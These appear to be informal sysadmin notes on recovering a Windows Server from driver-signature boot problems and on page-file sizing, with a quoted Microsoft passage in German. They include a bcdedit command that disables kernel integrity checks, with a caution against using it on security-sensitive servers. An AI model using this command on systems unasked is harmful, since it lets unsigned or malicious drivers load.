If the Server comes UP with "Disbale Driver Signature Enforcement" and you don't need that (Because it's not a high secure server you could disable it permanent). We do not recommend this on an Exchange Server as example or anything security related.

If it comes up run:

Sfc /scannow

Manually disable certificate signature validation:

open CMD.exe as an Administrator

bcdedit -set loadoptions DDISABLE_INTEGRITY_CHECKS

Re-enable the certificate validation

open CMD.exe as an Administrator

bcdedit -set loadoptions DENABLE_INTEGRITY_CHECKS

FAQ: How to remove Remove failed packages in Windows PE

Looking why the Server crashed with NIRSOFT tool Bluescreenview

Microsoft recommends the PAGE FILE Partition to be RAM + SOME XXXMB. This is what happens IF the Server ever has a blue screen so don't do it that way.

I am unsure if the Server would have picked the Partition if no more space was there (Like they recommend). Never like that Rekommandation.

Die Größe der Auslagerungsdatei sollte die Größe des physikalischen RAMs im System überschreiten (SharePoint Server) - SharePoint Server | Microsoft Docs

Ursache: Eine bewährte Methode für Windows ist es, die Größe der Auslagerungsdatei auf einen Wert größer als oder gleich der Gesamtmenge des verfügbaren physischen Speichers festzulegen. Für die automatische Wiederherstellung von Heapspeicher funktioniert die Speicherbereinigung in der Regel effektiver, wenn die Größe des verwalteten Heapspeichers sich der Auslagerungsgröße nähert. Unterschreitet die Größe der Auslagerungsdatei die RAM-Größe, werden neue Zuordnungen von verwaltetem Speicher erteilt, wodurch die Speicherbereinigung aufwändiger wird und die CPU-Beanspruchung steigt.